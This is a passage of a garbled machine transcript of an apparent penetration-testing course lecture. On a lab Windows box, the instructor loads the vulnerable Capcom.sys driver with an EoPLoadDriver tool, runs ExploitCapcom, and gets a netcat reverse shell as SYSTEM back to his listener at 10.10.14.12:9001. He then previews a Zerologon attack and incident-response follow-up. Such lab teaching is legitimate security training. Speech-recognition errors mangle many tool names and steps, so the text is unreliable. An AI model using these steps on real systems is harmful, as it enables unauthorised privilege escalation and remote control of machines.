00:26:48,770 So let's start there and let's modify if it doesn't work. 404 00:26:48,800 --> 00:27:01,580 OK, so we've got CD, data, CD, HP, Universal Print Driver are OK suite that we can upload uploaded 405 00:27:01,580 --> 00:27:03,410 Capcom that says. 406 00:27:06,370 --> 00:27:15,190 Upload EOP load driver Niyazi, and she's pulling all this from the local directory, this home folder 407 00:27:15,190 --> 00:27:18,610 boxes views because I ran it even when I ran out of this folder. 408 00:27:18,610 --> 00:27:25,030 So it knows just to look in this folder for any argument I pass to the upload command and this is a 409 00:27:25,030 --> 00:27:25,240 win. 410 00:27:25,240 --> 00:27:28,240 R.M. Even when our feature this upload command and I'm using. 411 00:27:29,560 --> 00:27:32,920 All right, so we exploit Gap Condry exceed. 412 00:27:38,330 --> 00:27:41,960 And then, of course, they want to upload our beloved. 413 00:27:44,090 --> 00:27:49,100 Speaking of that cat, we need to make sure we set up our handler for Narcan versus make sure we have 414 00:27:49,120 --> 00:27:49,680 our files here. 415 00:27:49,700 --> 00:27:50,030 We do. 416 00:27:51,350 --> 00:27:51,920 That looks good. 417 00:27:52,310 --> 00:27:53,060 Puts it up our neck. 418 00:27:53,060 --> 00:27:58,300 Cat handler, what are we going to do when he's arnol rapper to catch it? 419 00:27:58,310 --> 00:27:59,440 Now, what is RL rap? 420 00:27:59,450 --> 00:28:02,300 You see, I don't have it installed right here because that's why it's red. 421 00:28:03,200 --> 00:28:03,980 I'll tell you what it is. 422 00:28:03,990 --> 00:28:06,160 CIDRAP Search R Rap. 423 00:28:09,110 --> 00:28:09,530 All right. 424 00:28:10,430 --> 00:28:14,390 Cee Lo Apte C what does it show. 425 00:28:15,380 --> 00:28:17,090 Try to hit Cee Lo's space app. 426 00:28:17,240 --> 00:28:18,770 Space tab. 427 00:28:20,600 --> 00:28:22,490 That's how I got that list of everything I needed. 428 00:28:22,800 --> 00:28:23,810 You see what this does, right? 429 00:28:24,370 --> 00:28:30,530 It's a red line editor and it's a featured command line rapper. 430 00:28:32,300 --> 00:28:34,490 Input history is remembered across invocations. 431 00:28:35,000 --> 00:28:35,210 Right? 432 00:28:35,270 --> 00:28:40,190 This is what we want when we're connecting the reverse show back from Windows to Linux box because it 433 00:28:40,190 --> 00:28:44,100 gives us the UpDown functionality that we love to use in a window show. 434 00:28:44,160 --> 00:28:46,400 Trust me, without it, your life will suck with it. 435 00:28:46,520 --> 00:28:47,060 It won't. 436 00:28:47,420 --> 00:28:52,700 So just make sure you use it so you know, I'll wrap the Winslett. 437 00:28:54,560 --> 00:28:59,810 We didn't see the Apte install or wrap tech y to say yes to defaults. 438 00:29:01,100 --> 00:29:06,470 CEDO, rl wrap and C minus because of names. 439 00:29:07,100 --> 00:29:07,730 Be both. 440 00:29:07,730 --> 00:29:08,780 Listen on PT.. 441 00:29:09,080 --> 00:29:10,430 Nine thousand and one. 442 00:29:12,180 --> 00:29:16,820 Let's go back here and first we need to alert the driver so we'll say not backslash. 443 00:29:16,830 --> 00:29:22,100 This is how you execute executables inpower show because we are in power show. 444 00:29:24,350 --> 00:29:28,670 See this is a power show, command environment variables including the power show and you can see we're 445 00:29:28,670 --> 00:29:30,230 in person 5.1. 446 00:29:30,830 --> 00:29:32,030 That's what this means over here. 447 00:29:32,030 --> 00:29:33,740 We're in partial, right. 448 00:29:34,250 --> 00:29:40,610 So we can say Easthope load driver just to get a list of how we should use it. 449 00:29:40,790 --> 00:29:41,870 Right from our logic. 450 00:29:42,380 --> 00:29:48,290 So we give it the name registry, a registry value, and then the full path to the driver. 451 00:29:49,100 --> 00:29:59,750 So if we do Easthope load driver, not Yuxi and we can say system current control set Conforte. 452 00:30:00,650 --> 00:30:03,260 And then I'm going to follow the instructions exactly how it says here. 453 00:30:03,590 --> 00:30:03,940 Right. 454 00:30:03,950 --> 00:30:06,800 Even though how come that says is my local folder. 455 00:30:08,210 --> 00:30:10,100 I'm not just going to put a cap combat's this like this. 456 00:30:10,100 --> 00:30:11,320 Actually if we do that it won't work. 457 00:30:12,020 --> 00:30:12,670 I've tried it. 458 00:30:13,070 --> 00:30:15,820 I mean you have to put it exactly as it's written inside the XPoint. 459 00:30:15,840 --> 00:30:16,160 That's right. 460 00:30:16,160 --> 00:30:22,180 It's really important to really, you know, to read the instructions, you know, before you you run 461 00:30:22,360 --> 00:30:23,150 these exploits. 462 00:30:23,810 --> 00:30:27,910 The that's what the convenience artfulness. 463 00:30:30,020 --> 00:30:31,010 And what am I doing here? 464 00:30:31,070 --> 00:30:32,810 I want to put the second backslash. 465 00:30:34,380 --> 00:30:43,040 That's and then it's going to be Kaukab that says, let's see if this works when error zero. 466 00:30:43,250 --> 00:30:43,730 That's good. 467 00:30:43,730 --> 00:30:45,230 And I've got no zeros here. 468 00:30:45,830 --> 00:30:46,700 So it's probably loaded. 469 00:30:47,150 --> 00:30:51,920 And what we can do now is assuming that it is we can try to run this exploit Capcom and if all goes 470 00:30:51,920 --> 00:30:56,840 well, then we should get a reverse shell back to our system. 471 00:30:57,020 --> 00:30:57,380 Right. 472 00:30:57,680 --> 00:31:05,690 You remember back here, what we did is we just told we're telling it to, you know, go to Windows 473 00:31:06,080 --> 00:31:10,520 System to command at XY and run this command NCDC. 474 00:31:10,610 --> 00:31:18,080 It's going to know where NCDC is because we are currently executing this exploit from a directory that 475 00:31:18,080 --> 00:31:19,160 contains that binary. 476 00:31:19,940 --> 00:31:23,120 That's our IP ten, ten, fourteen, twelve, nine thousand one. 477 00:31:23,120 --> 00:31:29,240 We're listening on that and send back ACMD Shell, which should be running our system and see what listening 478 00:31:29,240 --> 00:31:30,410 important nine thousand one here. 479 00:31:30,970 --> 00:31:31,280 Right. 480 00:31:32,180 --> 00:31:33,470 So hopefully that makes sense. 481 00:31:34,160 --> 00:31:35,320 Let's go ahead and give it. 482 00:31:35,330 --> 00:31:38,030 Go see what happens when the truth. 483 00:31:41,160 --> 00:31:42,960 Bam, we did get a show back. 484 00:31:42,980 --> 00:31:50,110 But is it running a system and it is so there we go, we just escalate our privileges system, control 485 00:31:50,120 --> 00:31:56,520 easy to system into the system and look at all the privileges now that we have in the box. 486 00:31:56,540 --> 00:31:57,710 This box is now ours. 487 00:31:58,640 --> 00:32:04,730 In the next lecture, we're actually going to use another technique to break into the system. 488 00:32:05,430 --> 00:32:09,650 I mean, sorry to escalate our privileges and we're going to use a new zero log on. 489 00:32:10,640 --> 00:32:13,110 It's relatively new by the time you go through this video. 490 00:32:13,130 --> 00:32:17,240 It may not be so new, but it was really interesting because it's basically one click the domain admin 491 00:32:18,020 --> 00:32:20,810 and I want to see if we can give it a go on this machine. 492 00:32:20,990 --> 00:32:23,300 And then, of course, we'll go through the Internet response process. 493 00:32:23,300 --> 00:32:26,990 We'll look at the logs, we'll see what we could have, what we could have detected from an incident 494 00:32:26,990 --> 00:32:30,290 response perspective, and then we'll map everything to the minor attack framework. 495 00:32:30,380 --> 00:32:30,640 All right. 496 00:32:30,650 --> 00:32:32,360 I'll see you guys in the next lecture by.